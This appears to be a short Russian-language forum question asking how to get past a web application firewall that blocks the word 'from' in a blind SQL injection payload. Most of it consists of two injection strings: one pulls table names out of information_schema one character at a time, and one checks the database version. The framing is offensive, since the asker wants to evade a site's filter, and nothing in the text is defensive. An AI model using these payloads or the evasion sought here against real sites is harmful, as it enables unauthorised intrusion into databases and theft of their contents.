Как обойти WAF если фильтрует слово from при такой подстановки:

+and+ascii(substring((select+table_name+from+infor mation_schema.

tables+limit+1,1),1,1 ))>0--

а так всё нормально:

+and+substring(version(),1,1)=5--